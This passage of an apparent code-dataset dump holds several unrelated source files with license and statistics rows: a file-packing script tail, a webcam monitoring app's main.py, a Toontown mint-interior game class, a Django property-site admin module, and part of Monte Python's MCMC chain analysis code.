if path.exists( packed_fname ) and ( path.getmtime( fname ) < path.getmtime( packed_fname ) ):
print "Packed is current: %s" % fname
continue
print "%(fname)s --> packed/%(fname)s" % d
# Create destination dir if necessary.
dir, name = os.path.split( packed_fname )
if not path.exists( dir ):
print "Creating needed directory %s" % dir
os.makedirs( dir )
# Copy/pack.
if fname in do_not_pack:
copyfile( fname, path.join( packed_fname ) )
else:
out = call( cmd % d, shell=True )
|
gpl-3.0
| -941,269,120,476,930,600 | 28.134328 | 136 | 0.618852 | false | 3.549091 | false | false | false |
Skydes/Monitoring
|
src/main.py
|
1
|
2622
|
#!/usr/bin/env python
'''
Copyright (c) 2016, Paul-Edouard Sarlin
All rights reserved.
Project: Autonomous Monitoring System
File: main.py
Date: 2016-08-08
Author: Paul-Edouard Sarlin
Website: https://github.com/skydes/monitoring
'''
from multiprocessing import Queue, Lock
from Queue import Empty
from rocket import Rocket
from threading import Thread
import signal
import time
import cv2
import json
import logging, logging.handlers
from capture import Capture
from processing import Processing
from cloud import Dropbox
from server import *
QUEUE_MAXSIZE = 10
PORT = 8000
# Setup logging
logFormatter = logging.Formatter(fmt='%(levelname)-8s %(module)-15s %(asctime)-20s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.INFO)
fileHandler = logging.handlers.RotatingFileHandler("./log/app.log", maxBytes=30000, backupCount=5)
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
# Setup configuration
with open("conf.json") as json_file:
app.conf.update(json.load(json_file))
# Initialize and configure threads
app.pre_queue = Queue(maxsize=QUEUE_MAXSIZE)
app.post_queue = Queue(maxsize=QUEUE_MAXSIZE)
app.server_queue = Queue(maxsize=1)
app.conf_lock = Lock()
# Make the main process ignore SIGINT
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
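# Pipeline sketch (roles inferred from the constructor arguments below): Capture
# produces frames into pre_queue, Processing consumes them and pushes results
# into post_queue, and the Dropbox thread drains post_queue for upload while the
# single-slot server_queue hands the latest item to the web server.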
app.capture_th = Capture(app.pre_queue, app.conf, app.conf_lock)
app.processing_th = Processing(app.pre_queue, app.post_queue, app.conf, app.conf_lock)
app.dropbox_th = Dropbox(app.post_queue, app.server_queue, app.conf, app.conf_lock)
app.capture_th.setDevice("video0")
# Launch threads
app.dropbox_th.start()
app.processing_th.start()
app.capture_th.start()
logging.info("Threads started.")
# Restore the SIGINT handler
signal.signal(signal.SIGINT, original_sigint_handler)
# Launch server
rocket_server = Rocket(('localhost', PORT), 'wsgi', {'wsgi_app': app})
app.server_th = Thread(target=rocket_server.start, name='rocket_server')
app.server_th.start()
logging.getLogger("Rocket").setLevel(logging.INFO)
logging.info("Server started.")
try:
while app.server_th.is_alive():
app.server_th.join(1)
except (KeyboardInterrupt, SystemExit):
rocket_server.stop()
logging.info("Server stopped.")
app.capture_th.stop()
app.capture_th.join()
app.processing_th.stop()
app.processing_th.join()
app.dropbox_th.stop()
app.dropbox_th.join()
cv2.destroyAllWindows()
|
bsd-3-clause
| -800,108,648,192,495,700 | 26.893617 | 130 | 0.745995 | false | 3.273408 | false | false | false |
ToonTownInfiniteRepo/ToontownInfinite
|
toontown/coghq/MintInterior.py
|
1
|
10229
|
from direct.directnotify import DirectNotifyGlobal
from toontown.battle import BattlePlace
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.showbase import BulletinBoardWatcher
from pandac.PandaModules import *
from otp.distributed.TelemetryLimiter import RotationLimitToH, TLGatherAllAvs
from toontown.toon import Toon
from toontown.toonbase import ToontownGlobals
from toontown.hood import ZoneUtil
from toontown.toonbase import TTLocalizer
from toontown.toontowngui import TTDialog
from toontown.toonbase import ToontownBattleGlobals
from toontown.coghq import DistributedMint
from otp.nametag import NametagGlobals
class MintInterior(BattlePlace.BattlePlace):
notify = DirectNotifyGlobal.directNotify.newCategory('MintInterior')
def __init__(self, loader, parentFSM, doneEvent):
BattlePlace.BattlePlace.__init__(self, loader, doneEvent)
self.parentFSM = parentFSM
self.zoneId = loader.mintId
self.fsm = ClassicFSM.ClassicFSM('MintInterior', [State.State('start', self.enterStart, self.exitStart, ['walk', 'teleportIn', 'fallDown']),
State.State('walk', self.enterWalk, self.exitWalk, ['push',
'sit',
'stickerBook',
'WaitForBattle',
'battle',
'died',
'teleportOut',
'squished',
'DFA',
'fallDown',
'stopped']),
State.State('stopped', self.enterStopped, self.exitStopped, ['walk', 'teleportOut', 'stickerBook']),
State.State('sit', self.enterSit, self.exitSit, ['walk', 'died', 'teleportOut']),
State.State('push', self.enterPush, self.exitPush, ['walk', 'died', 'teleportOut']),
State.State('stickerBook', self.enterStickerBook, self.exitStickerBook, ['walk',
'battle',
'DFA',
'WaitForBattle',
'died',
'teleportOut']),
State.State('WaitForBattle', self.enterWaitForBattle, self.exitWaitForBattle, ['battle',
'walk',
'died',
'teleportOut']),
State.State('battle', self.enterBattle, self.exitBattle, ['walk', 'teleportOut', 'died']),
State.State('fallDown', self.enterFallDown, self.exitFallDown, ['walk', 'died', 'teleportOut']),
State.State('squished', self.enterSquished, self.exitSquished, ['walk', 'died', 'teleportOut']),
State.State('teleportIn', self.enterTeleportIn, self.exitTeleportIn, ['walk',
'teleportOut',
'quietZone',
'died']),
State.State('teleportOut', self.enterTeleportOut, self.exitTeleportOut, ['teleportIn',
'FLA',
'quietZone',
'WaitForBattle']),
State.State('DFA', self.enterDFA, self.exitDFA, ['DFAReject', 'teleportOut']),
         State.State('DFAReject', self.enterDFAReject, self.exitDFAReject, ['walk', 'teleportOut']),
State.State('died', self.enterDied, self.exitDied, ['teleportOut']),
State.State('FLA', self.enterFLA, self.exitFLA, ['quietZone']),
State.State('quietZone', self.enterQuietZone, self.exitQuietZone, ['teleportIn']),
State.State('final', self.enterFinal, self.exitFinal, ['start'])], 'start', 'final')
def load(self):
self.parentFSM.getStateNamed('mintInterior').addChild(self.fsm)
BattlePlace.BattlePlace.load(self)
self.music = base.loadMusic('phase_9/audio/bgm/CHQ_FACT_bg.ogg')
def unload(self):
self.parentFSM.getStateNamed('mintInterior').removeChild(self.fsm)
del self.music
del self.fsm
del self.parentFSM
BattlePlace.BattlePlace.unload(self)
def enter(self, requestStatus):
self.fsm.enterInitialState()
base.transitions.fadeOut(t=0)
base.localAvatar.inventory.setRespectInvasions(0)
base.cr.forbidCheesyEffects(1)
self._telemLimiter = TLGatherAllAvs('MintInterior', RotationLimitToH)
def commence(self = self):
NametagGlobals.setMasterArrowsOn(1)
self.fsm.request(requestStatus['how'], [requestStatus])
base.playMusic(self.music, looping=1, volume=0.8)
base.transitions.irisIn()
mint = bboard.get(DistributedMint.DistributedMint.ReadyPost)
self.loader.hood.spawnTitleText(mint.mintId, mint.floorNum)
self.mintReadyWatcher = BulletinBoardWatcher.BulletinBoardWatcher('MintReady', DistributedMint.DistributedMint.ReadyPost, commence)
self.mintDefeated = 0
self.acceptOnce(DistributedMint.DistributedMint.WinEvent, self.handleMintWinEvent)
if __debug__ and 0:
self.accept('f10', lambda : messenger.send(DistributedMint.DistributedMint.WinEvent))
self.confrontedBoss = 0
def handleConfrontedBoss(self = self):
self.confrontedBoss = 1
self.acceptOnce('localToonConfrontedMintBoss', handleConfrontedBoss)
def exit(self):
NametagGlobals.setMasterArrowsOn(0)
bboard.remove(DistributedMint.DistributedMint.ReadyPost)
self._telemLimiter.destroy()
del self._telemLimiter
base.cr.forbidCheesyEffects(0)
base.localAvatar.inventory.setRespectInvasions(1)
self.fsm.requestFinalState()
self.loader.music.stop()
self.music.stop()
self.ignoreAll()
del self.mintReadyWatcher
def enterWalk(self, teleportIn = 0):
BattlePlace.BattlePlace.enterWalk(self, teleportIn)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterPush(self):
BattlePlace.BattlePlace.enterPush(self)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterWaitForBattle(self):
MintInterior.notify.debug('enterWaitForBattle')
BattlePlace.BattlePlace.enterWaitForBattle(self)
if base.localAvatar.getParent() != render:
base.localAvatar.wrtReparentTo(render)
base.localAvatar.b_setParent(ToontownGlobals.SPRender)
def exitWaitForBattle(self):
MintInterior.notify.debug('exitWaitForBattle')
BattlePlace.BattlePlace.exitWaitForBattle(self)
def enterBattle(self, event):
MintInterior.notify.debug('enterBattle')
self.music.stop()
BattlePlace.BattlePlace.enterBattle(self, event)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterTownBattle(self, event):
mult = ToontownBattleGlobals.getMintCreditMultiplier(self.zoneId)
base.localAvatar.inventory.setBattleCreditMultiplier(mult)
self.loader.townBattle.enter(event, self.fsm.getStateNamed('battle'), bldg=1, creditMultiplier=mult)
def exitBattle(self):
MintInterior.notify.debug('exitBattle')
BattlePlace.BattlePlace.exitBattle(self)
self.loader.music.stop()
base.playMusic(self.music, looping=1, volume=0.8)
def enterStickerBook(self, page = None):
BattlePlace.BattlePlace.enterStickerBook(self, page)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterSit(self):
BattlePlace.BattlePlace.enterSit(self)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterZone(self, zoneId):
pass
def enterTeleportOut(self, requestStatus):
MintInterior.notify.debug('enterTeleportOut()')
BattlePlace.BattlePlace.enterTeleportOut(self, requestStatus, self.__teleportOutDone)
def __processLeaveRequest(self, requestStatus):
hoodId = requestStatus['hoodId']
if hoodId == ToontownGlobals.MyEstate:
self.getEstateZoneAndGoHome(requestStatus)
else:
self.doneStatus = requestStatus
messenger.send(self.doneEvent)
def __teleportOutDone(self, requestStatus):
MintInterior.notify.debug('__teleportOutDone()')
messenger.send('leavingMint')
messenger.send('localToonLeft')
if self.mintDefeated and not self.confrontedBoss:
self.fsm.request('FLA', [requestStatus])
else:
self.__processLeaveRequest(requestStatus)
def exitTeleportOut(self):
MintInterior.notify.debug('exitTeleportOut()')
BattlePlace.BattlePlace.exitTeleportOut(self)
def handleMintWinEvent(self):
MintInterior.notify.debug('handleMintWinEvent')
if base.cr.playGame.getPlace().fsm.getCurrentState().getName() == 'died':
return
self.mintDefeated = 1
if 1:
zoneId = ZoneUtil.getHoodId(self.zoneId)
else:
zoneId = ZoneUtil.getSafeZoneId(base.localAvatar.defaultZone)
self.fsm.request('teleportOut', [{'loader': ZoneUtil.getLoaderName(zoneId),
'where': ZoneUtil.getToonWhereName(zoneId),
'how': 'teleportIn',
'hoodId': zoneId,
'zoneId': zoneId,
'shardId': None,
'avId': -1}])
def enterDied(self, requestStatus, callback = None):
MintInterior.notify.debug('enterDied')
def diedDone(requestStatus, self = self, callback = callback):
if callback is not None:
callback()
messenger.send('leavingMint')
self.doneStatus = requestStatus
messenger.send(self.doneEvent)
return
BattlePlace.BattlePlace.enterDied(self, requestStatus, diedDone)
def enterFLA(self, requestStatus):
MintInterior.notify.debug('enterFLA')
self.flaDialog = TTDialog.TTGlobalDialog(message=TTLocalizer.ForcedLeaveMintAckMsg, doneEvent='FLADone', style=TTDialog.Acknowledge, fadeScreen=1)
def continueExit(self = self, requestStatus = requestStatus):
self.__processLeaveRequest(requestStatus)
self.accept('FLADone', continueExit)
self.flaDialog.show()
def exitFLA(self):
MintInterior.notify.debug('exitFLA')
if hasattr(self, 'flaDialog'):
self.flaDialog.cleanup()
del self.flaDialog
|
mit
| 7,421,334,415,014,637,000 | 41.620833 | 154 | 0.655587 | false | 3.601761 | false | false | false |
signalfire/django-property
|
homes/admin.py
|
1
|
2271
|
from mapwidgets.widgets import GooglePointFieldWidget
from django.contrib import admin
from django.contrib.gis.db import models
from django.utils.translation import ugettext as _
from homes.models import Block, Banner, SEO, SearchPrice, Branch, PropertyTenure, PropertyType, Alert, MediaType
class SearchPriceAdmin(admin.ModelAdmin):
fields = ('type', 'label', 'price')
class BranchAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',), }
fieldsets = (
(_('General'), {
'fields': ['name', 'slug', 'status']
}),
(_('Address'), {
'fields': ['address_1', 'address_2', 'address_3', 'town_city', 'county', 'postcode'],
}),
(_('Geographic'), {
'fields': ['location']
}),
(_('Contact'), {
'fields': ['telephone', 'email']
}),
(_('Details'), {
'fields': ['details', 'opening_hours']
})
)
formfield_overrides = {
models.PointField: {"widget": GooglePointFieldWidget}
}
class Media:
css = {
'all':['build/css/admin/override/map.min.css']
}
class PropertyTypeAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class MediaTypeAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class PropertyTenureAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class BlockAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',), }
list_display = ('name', 'slug')
fields = ('name','slug','content','status')
class BannerAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('title',), }
list_display = ('title', 'slug', 'action', 'label')
fields = ('title', 'subtitle', 'action', 'label', 'slug', 'attachment', 'status')
class SEOAdmin(admin.ModelAdmin):
list_display = ('url', 'title')
admin.site.register(SearchPrice, SearchPriceAdmin)
admin.site.register(Branch, BranchAdmin)
admin.site.register(Banner, BannerAdmin)
admin.site.register(PropertyType, PropertyTypeAdmin)
admin.site.register(PropertyTenure, PropertyTenureAdmin)
admin.site.register(MediaType, MediaTypeAdmin)
admin.site.register(Block, BlockAdmin)
admin.site.register(SEO, SEOAdmin)
admin.site.register(Alert)
|
mit
| 5,921,387,022,681,501,000 | 28.115385 | 112 | 0.630559 | false | 3.710784 | false | false | false |
miguelzuma/montepython_zuma
|
montepython/analyze.py
|
1
|
95056
|
"""
.. module:: analyze
:synopsis: Extract data from chains and produce plots
.. moduleauthor:: Karim Benabed <[email protected]>
.. moduleauthor:: Benjamin Audren <[email protected]>
Collection of functions needed to analyze the Markov chains.
This module also defines a class :class:`Information`, which stores useful
quantities and shortens the argument passing between the functions.
.. note::
Some of the methods used in this module are directly adapted from the
    `CosmoPmc <http://www.cosmopmc.info>`_ code from Kilbinger et al.
"""
import os
import math
import numpy as np
from itertools import count
# The root plotting module, to change options like font sizes, etc...
import matplotlib
# The following line suppresses the need for an X server
matplotlib.use("Agg")
# Module for handling display
import matplotlib.pyplot as plt
# Module to handle warnings from matplotlib
import warnings
import importlib
import io_mp
from itertools import ifilterfalse
from itertools import ifilter
import scipy.ndimage
# Defined to remove the burnin for all the points that were produced before the
# first time where -log-likelihood <= min-minus-log-likelihood+LOG_LKL_CUTOFF
LOG_LKL_CUTOFF = 3
NUM_COLORS = 6
def analyze(command_line):
"""
Main function, does the entire analysis.
It calls in turn all the other routines from this module. To limit the
    arguments of each function to a reasonable size, an :class:`Information`
instance is used. This instance is initialized in this function, then
appended by the other routines.
"""
# Check if the scipy module has the interpolate method correctly
# installed (should be the case on every linux distribution with
# standard numpy)
try:
from scipy.interpolate import interp1d
Information.has_interpolate_module = True
except ImportError:
Information.has_interpolate_module = False
warnings.warn(
'No cubic interpolation done (no interpolate method found ' +
'in scipy), only linear')
# Determine how many different folders are asked through the 'info'
# command, and create as many Information instances
files = separate_files(command_line.files)
# Create an instance of the Information class for each subgroup found in
# the previous function. They will each hold all relevant information, and
# be used as a compact way of exchanging information between functions
information_instances = []
for item in files:
info = Information(command_line)
information_instances.append(info)
# Prepare the files, according to the case, load the log.param, and
# prepare the output (plots folder, .covmat, .info and .log files).
# After this step, info.files will contain all chains.
status = prepare(item, info)
# If the preparation step generated new files (for instance,
# translating from NS or CH to Markov Chains) this routine should stop
# now.
if not status:
return
# Compute the mean, maximum of likelihood, 1-sigma variance for this
# main folder. This will create the info.chain object, which contains
# all the points computed stacked in one big array.
convergence(info)
# check if analyze() is called directly by the user, or by the mcmc loop during an updating phase
try:
# command_line.update is defined when called by the mcmc loop
command_line.update
except:
# in case it was not defined (i.e. when analyze() is called directly by user), set it to False
command_line.update = 0
# compute covariance matrix, excepted when we are in update mode and convergence is too bad or too good
if command_line.update and (np.amax(info.R) > 3. or np.amax(info.R) < 0.4):
print '--> Not computing covariance matrix'
else:
try:
if command_line.want_covmat:
print '--> Computing covariance matrix'
info.covar = compute_covariance_matrix(info)
# Writing it out in name_of_folder.covmat
io_mp.write_covariance_matrix(
info.covar, info.backup_names, info.cov_path)
except:
print '--> Computing covariance matrix failed'
pass
# Store an array, sorted_indices, containing the list of indices
# corresponding to the line with the highest likelihood as the first
# element, and then as decreasing likelihood
info.sorted_indices = info.chain[:, 1].argsort(0)
# Writing the best-fit model in name_of_folder.bestfit
bestfit_line = [elem*info.scales[i, i] for i, elem in
enumerate(info.chain[info.sorted_indices[0], 2:])]
io_mp.write_bestfit_file(bestfit_line, info.backup_names,
info.best_fit_path)
if not command_line.minimal:
# Computing 1,2 and 3-sigma errors, and plot. This will create the
# triangle and 1d plot by default.
compute_posterior(information_instances)
print '--> Writing .info and .tex files'
for info in information_instances:
info.write_information_files()
# when called by MCMC in update mode, return R values so that they can be written for information in the chains
if command_line.update:
return info.R
def prepare(files, info):
"""
Scan the whole input folder, and include all chains in it.
    Since you can decide to analyze either some file(s) or a complete folder, this
    function first needs to distinguish between the two cases.
.. warning::
        If someday you change the way the chains are named, remember to change
        it here too, because this routine assumes the chains have a double
underscore in their names.
.. note::
Only files ending with .txt will be selected, to keep compatibility
with CosmoMC format
.. note::
New in version 2.0.0: if you ask to analyze a Nested Sampling
sub-folder (i.e. something that ends in `NS` with capital letters), the
analyze module will translate the output from Nested Sampling to
        standard chains for Monte Python, and stop. You can then run the
        `--info` flag on the whole folder. **This procedure is not necessary
if the run was complete, but only if the Nested Sampling run was killed
before completion**.
Parameters
----------
files : list
list of potentially only one element, containing the files to analyze.
This can be only one file, or the encompassing folder, files
info : Information instance
Used to store the result
"""
# First test if the folder is a Nested Sampling or CosmoHammer folder. If
# so, call the module's own routine through the clean conversion function,
# which will translate the output of this other sampling into MCMC chains
# that can then be analyzed.
modules = ['nested_sampling', 'cosmo_hammer']
tags = ['NS', 'CH']
for module_name, tag in zip(modules, tags):
action_done = clean_conversion(module_name, tag, files[0])
if action_done:
return False
# If the input command was an entire folder, then grab everything in it.
# Too small files (below 600 octets) and subfolders are automatically
# removed.
folder, files, basename = recover_folder_and_files(files)
info.files = files
info.folder = folder
info.basename = basename
# Check if the log.param file exists
parameter_file_path = os.path.join(folder, 'log.param')
if os.path.isfile(parameter_file_path):
if os.path.getsize(parameter_file_path) == 0:
raise io_mp.AnalyzeError(
"The log param file %s " % os.path.join(folder, 'log.param') +
"seems empty")
else:
raise io_mp.AnalyzeError(
"The log param file %s " % os.path.join(folder, 'log.param') +
"is missing in the analyzed folder?")
# If the folder has no subdirectory, then go for a simple infoname,
# otherwise, call it with the last name
basename = (os.path.basename(folder) if os.path.basename(folder) != '.'
else os.path.basename(os.path.abspath(
os.path.join(folder, '..'))))
info.v_info_path = os.path.join(folder, basename+'.v_info')
info.h_info_path = os.path.join(folder, basename+'.h_info')
info.tex_path = os.path.join(folder, basename+'.tex')
info.cov_path = os.path.join(folder, basename+'.covmat')
info.log_path = os.path.join(folder, basename+'.log')
info.best_fit_path = os.path.join(folder, basename+'.bestfit')
info.param_path = parameter_file_path
return True
def convergence(info):
"""
Compute convergence for the desired chains, using Gelman-Rubin diagnostic
Chains have been stored in the info instance of :class:`Information`. Note
that the G-R diagnostic can be computed for a single chain, although it will
most probably give absurd results. To do so, it separates the chain into
three subchains.
"""
# Recovering parameter names and scales, creating tex names,
extract_parameter_names(info)
# Now that the number of parameters is known, the array containing bounds
# can be initialised
info.bounds = np.zeros((len(info.ref_names), len(info.levels), 2))
# Circle through all files to find the global maximum of likelihood
#print '--> Finding global maximum of likelihood'
find_maximum_of_likelihood(info)
# Restarting the circling through files, this time removing the burnin,
# given the maximum of likelihood previously found and the global variable
# LOG_LKL_CUTOFF. spam now contains all the accepted points that were
# explored once the chain moved within min_minus_lkl - LOG_LKL_CUTOFF.
# If the user asks for a keep_fraction <1, this is also the place where
# a fraction (1-keep_fraction) is removed at the beginning of each chain.
#print '--> Removing burn-in'
spam = remove_bad_points(info)
info.remap_parameters(spam)
# Now that the list spam contains all the different chains removed of
# their respective burn-in, proceed to the convergence computation
# 2D arrays for mean and var, one column will contain the total (over
# all chains) mean (resp. variance), and each other column the
# respective chain mean (resp. chain variance). R only contains the
# values for each parameter. Therefore, mean and var will have len(spam)+1
# as a first dimension
mean = np.zeros((len(spam)+1, info.number_parameters))
var = np.zeros((len(spam)+1, info.number_parameters))
R = np.zeros(info.number_parameters)
# Store the total number of points, and the total in each chain
total = np.zeros(len(spam)+1)
for j in xrange(len(spam)):
total[j+1] = spam[j][:, 0].sum()
total[0] = total[1:].sum()
# Compute mean and variance for each chain
print '--> Computing mean values'
compute_mean(mean, spam, total)
print '--> Computing variance'
compute_variance(var, mean, spam, total)
print '--> Computing convergence criterion (Gelman-Rubin)'
# Gelman Rubin Diagnostic:
# Computes a quantity linked to the ratio of the mean of the variances of
# the different chains (within), and the variance of the means (between)
# Note: This is not strictly speaking the Gelman Rubin test, defined for
# same-length MC chains. Our quantity is defined without the square root,
# which should not change the result much: a small sqrt(R) will still be a
# small R. The same convention is used in CosmoMC, except for the weighted
# average: we decided to do the average taking into account that longer
# chains should count more
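# In formulas, the computation below amounts to, for each parameter i
# (with N_j the weighted number of points in chain j and N their sum):
#   W_i = sum_j N_j var_{j,i} / N                      ("within-chain" variance)
#   B_i = sum_j N_j (mean_{j,i} - mean_i)^2 / (N-1)     ("between-chain" variance)
#   R_i = B_i / W_i
# so that the quantity printed as "R-1" tends to zero when all chains
# sample the same distribution.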
within = 0
between = 0
for i in xrange(np.shape(mean)[1]):
for j in xrange(len(spam)):
within += total[j+1]*var[j+1, i]
between += total[j+1]*(mean[j+1, i]-mean[0, i])**2
within /= total[0]
between /= (total[0]-1)
R[i] = between/within
if i == 0:
print ' -> R-1 is %.6f' % R[i], '\tfor ', info.ref_names[i]
else:
print ' %.6f' % R[i], '\tfor ', info.ref_names[i]
# Log finally the total number of steps, and absolute loglikelihood
with open(info.log_path, 'a') as log:
log.write("--> Total number of steps: %d\n" % (
info.steps))
log.write("--> Total number of accepted steps: %d\n" % (
info.accepted_steps))
log.write("--> Minimum of -logLike : %.2f" % (
info.min_minus_lkl))
# Store the remaining members in the info instance, for further writing to
# files, storing only the mean and total of all the chains taken together
info.mean = mean[0]
info.R = R
info.total = total[0]
# Create the main chain, which consists in all elements of spam
# put together. This will serve for the plotting.
info.chain = np.vstack(spam)
def compute_posterior(information_instances):
"""
Computes the marginalized posterior distributions, and optionally plots
them
Parameters
----------
information_instances : list
list of information objects, initialised on the given folders or list
of files given as input. For each of these instances, plot the 1d and 2d
posterior distributions, depending on the flags stored in the instances,
coming from command line arguments or read from a file.
"""
# For convenience, store as `conf` the first element of the list
# information_instances, since it will be called often to check for
# configuration parameters
conf = information_instances[0]
# Pre configuration of the output, note that changes to the font size
# will occur later on as well, to obtain a nice scaling.
matplotlib.rc('text', usetex=True)
matplotlib.rc('font', size=11)
matplotlib.rc('xtick', labelsize='8')
matplotlib.rc('ytick', labelsize='8')
# Recover max and min values for each instance, defining the a priori place
# of ticks (in case of a comparison, this should change)
for info in information_instances:
info.define_ticks()
# If plots/ folder in output folder does not exist, create it
if os.path.isdir(os.path.join(info.folder, 'plots')) is False:
os.mkdir(os.path.join(info.folder, 'plots'))
# Determine the total number of parameters to plot, based on the list
# without duplicates of the plotted parameters of all information instances
plotted_parameters = []
# For printing not in latex
ref_names = []
for info in information_instances:
for index, name in enumerate(info.plotted_parameters):
if name not in plotted_parameters:
plotted_parameters.append(name)
ref_names.append(info.ref_names[index])
if len(plotted_parameters) == 0:
raise io_mp.AnalyzeError(
"You provided no parameters to analyze, probably by selecting"
" wrong parameters names in the '--extra' file.")
# Find the appropriate number of columns and lines for the 1d posterior
# plot
if conf.num_columns_1d is None:
num_columns = int(round(math.sqrt(len(plotted_parameters))))
else:
num_columns = conf.num_columns_1d
num_lines = int(math.ceil(len(plotted_parameters)*1.0/num_columns))
# For special needs, you can impose here a different number of columns and lines in the 1d plot
# Here is a commented example:
# if (len(plotted_parameters) == 10):
# num_columns = 5
# num_lines = 2
# Create the figures
# which will be 3*3 inches per subplot, quickly growing!
if conf.plot:
fig1d = plt.figure(num=1, figsize=(
3*num_columns,
3*num_lines), dpi=80)
if conf.plot_2d:
fig2d = plt.figure(num=2, figsize=(
3*len(plotted_parameters),
3*len(plotted_parameters)), dpi=80)
# Create the name of the files, concatenating the basenames with
# underscores.
file_name = "_".join(
[info.basename for info in information_instances])
# Loop over all the plotted parameters
# There will be two indices at all time, the one running over the plotted
# parameters, `index`, and the one corresponding to the actual column in
# the actual file, `native_index`. For instance, if you try to plot only
# two columns of a file with several columns, index will vary from 0 to 1, but
# the corresponding native indices might be anything.
# Obviously, since plotted parameters contain potentially names not
# contained in some files (in case of a comparison), native index might be
# undefined.
# Define the legends object, which will store the plot style, to display
# at the level of the figure
legends = [None for _ in range(len(information_instances))]
if not conf.legendnames:
legend_names = [info.basename.replace('_', ' ')
for info in information_instances]
else:
legend_names = conf.legendnames
print '-----------------------------------------------'
for index, name in enumerate(plotted_parameters):
# Adding the subplots to the respective figures, this will correspond
# to the diagonal on the triangle plot.
if conf.plot_2d:
ax2d = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
index*(len(plotted_parameters)+1)+1,
yticks=[])
if conf.plot:
ax1d = fig1d.add_subplot(
num_lines, num_columns, index+1, yticks=[])
# check for each instance if the name is part of the list of plotted
# parameters, and if yes, store the native_index. If not, store a flag
# to ignore any further plotting or computing issues concerning this
# particular instance.
for info in information_instances:
try:
info.native_index = info.ref_names.index(name)
info.ignore_param = False
standard_name = info.backup_names[info.native_index]
except ValueError:
info.ignore_param = True
# The limits might have been enforced by the user
if name in conf.force_limits.iterkeys():
x_span = conf.force_limits[name][1]-conf.force_limits[name][0]
tick_min = conf.force_limits[name][0] +0.1*x_span
tick_max = conf.force_limits[name][1] -0.1*x_span
ticks = np.linspace(tick_min,
tick_max,
info.ticknumber)
for info in information_instances:
if not info.ignore_param:
info.x_range[info.native_index] = conf.force_limits[name]
info.ticks[info.native_index] = ticks
# otherwise, find them automatically
else:
adjust_ticks(name, information_instances)
print ' -> Computing histograms for ', name
for info in information_instances:
if not info.ignore_param:
# 1D posterior normalised to P_max=1 (first step)
#
# simply the histogram from the chains, with few bins
#
info.hist, info.bin_edges = np.histogram(
info.chain[:, info.native_index+2], bins=info.bins,
weights=info.chain[:, 0], normed=False, density=False)
info.hist = info.hist/info.hist.max()
info.bincenters = 0.5*(info.bin_edges[1:]+info.bin_edges[:-1])
# 1D posterior normalised to P_max=1 (second step)
#
# returns a histogram still normalised to one, but with a ten times finer sampling;
# >> first, tries a method with spline interpolation between bin centers and extrapolation at the edges
# >> if it fails, a simpler and more robust method of linear interpolation between bin centers is used
# >> if the interpolation module is not installed, this step keeps the same posterior
#
info.interp_hist, info.interp_grid = cubic_interpolation(
info, info.hist, info.bincenters)
# minimum credible interval (method by Jan Haman). Fails for
# multimodal histograms
bounds = minimum_credible_intervals(info)
info.bounds[info.native_index] = bounds
# plotting
for info in information_instances:
if not info.ignore_param:
# 1D posterior normalised to P_max=1 (third step, used only for plotting)
#
# apply gaussian smoothing
#
# factor by which the grid has been made finer (10 means 10 times more bins)
interpolation_factor = float(len(info.interp_grid))/float(len(info.bincenters))
# factor for gaussian smoothing
sigma = interpolation_factor*info.gaussian_smoothing
# smooth
smoothed_interp_hist = scipy.ndimage.filters.gaussian_filter(info.interp_hist,sigma)
# re-normalised
smoothed_interp_hist = smoothed_interp_hist/smoothed_interp_hist.max()
if conf.plot_2d:
##################################################
# plot 1D posterior in diagonal of triangle plot #
##################################################
plot = ax2d.plot(
info.interp_grid,
smoothed_interp_hist,
linewidth=info.line_width, ls='-',
color = info.MP_color_cycle[info.id][1],
# the [1] picks up the color of the 68% contours
# with [0] you would get that of the 95% contours
alpha = info.alphas[info.id])
legends[info.id] = plot[0]
ax2d.set_xticks(info.ticks[info.native_index])
if conf.legend_style == 'top':
ax2d.set_title(
'%s=$%.{0}g^{{+%.{0}g}}_{{%.{0}g}}$'.format(
info.decimal) % (
info.tex_names[info.native_index],
info.mean[info.native_index],
info.bounds[info.native_index, 0, -1],
info.bounds[info.native_index, 0, 0]),
fontsize=info.fontsize)
ax2d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
elif conf.legend_style == 'sides':
# Except for the last 1d plot (bottom line), don't
# print ticks
if index == len(plotted_parameters)-1:
ax2d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
ax2d.tick_params('x',direction='inout')
ax2d.set_xlabel(
info.tex_names[info.native_index],
fontsize=info.fontsize)
else:
ax2d.set_xticklabels([])
ax2d.axis([info.x_range[info.native_index][0],
info.x_range[info.native_index][1],
0, 1.05])
if conf.plot:
if conf.short_title_1d:
ax1d.set_title(
'%s'.format(info.decimal) % (
info.tex_names[info.native_index]),
fontsize=info.fontsize)
else:
# Note the use of double curly brackets {{ }} to produce
# the desired LaTeX output. This is necessary because the
# format function would otherwise understand single
# brackets as fields.
ax1d.set_title(
'%s=$%.{0}g^{{+%.{0}g}}_{{%.{0}g}}$'.format(
info.decimal) % (
info.tex_names[info.native_index],
info.mean[info.native_index],
info.bounds[info.native_index, 0, -1],
info.bounds[info.native_index, 0, 0]),
fontsize=info.fontsize)
ax1d.set_xticks(info.ticks[info.native_index])
ax1d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
